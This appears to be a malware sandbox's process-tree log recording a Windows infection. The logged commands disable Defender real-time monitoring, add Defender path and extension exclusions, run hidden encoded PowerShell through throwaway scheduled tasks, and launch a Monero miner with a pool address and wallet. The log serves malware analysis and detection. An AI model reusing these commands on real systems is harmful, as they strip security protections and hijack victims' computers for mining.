  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:268
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:944
- C:\Users\Admin\AppData\Roaming\jiegbfg
  C:\Users\Admin\AppData\Roaming\jiegbfg
  2⤵
  PID:1884
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:2232
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:2624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12751884-244759756313823776060321702022276224-15188894601678670200802451047"
1⤵
PID:3916

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:1476
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:3160
- - C:\Windows\Temp\673045.exe
    "C:\Windows\Temp\673045.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    PID:3652

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240505224807.log C:\Windows\Logs\CBS\CbsPersist_20240505224807.cab
1⤵
PID:4036

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\4950.bat" "
1⤵
PID:3848
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:4028

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\6AC5.bat" "
1⤵
PID:3336
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:2392

C:\Windows\system32\taskeng.exe
taskeng.exe {5C9DA46C-C82B-4A7B-9CE4-7F71EEF0A589} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2084
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\BwIdcxA.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\BwIdcxA.exe it /DLCdidcarz 385118 /S
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1960
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:3816
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:3124
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:916
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:2932
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1784
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:2892
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:2660
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:996
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:1448
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:3108
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1652
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:2732
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:3436
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3712
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3192
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:2964
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gThmyhCKc" /SC once /ST 15:46:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:448
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gThmyhCKc"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gThmyhCKc"
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:3324
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      PID:3108
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1208
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      PID:3600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ghneQPntO" /SC once /ST 19:12:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2112
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ghneQPntO"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ghneQPntO"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:3580
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:3352
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 14:25:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\lKdXuMn.exe\" GH /nIqNdidXA 385118 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:276
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "XyyyteIMwZeutaZuw"
    3⤵
    PID:2536
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\wEeBLUP.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\wEeBLUP.exe it /hkKdidLTBl 385118 /S
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2360
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2136
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:3964
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:1876
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1980
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:3056
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:4036
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2112
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:2644
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:3848
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1224
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:2228
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:2284
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:1408
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1532
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:3368
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gcNkjIruD" /SC once /ST 15:59:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1120
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gcNkjIruD"
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gcNkjIruD"
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      PID:1552
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2004
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        6⤵
        
        PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:848
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4028
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1208
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3712
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3276
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\nlECFbvN\UEMhcetwdKRcnOOL.wsf"
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\nlECFbvN\UEMhcetwdKRcnOOL.wsf"
    3⤵
    PID:3764
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2260
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1568
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3988
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3860
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2792
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2636
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:568
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3984
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3248
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3440
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3208
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3368
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2164
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3320
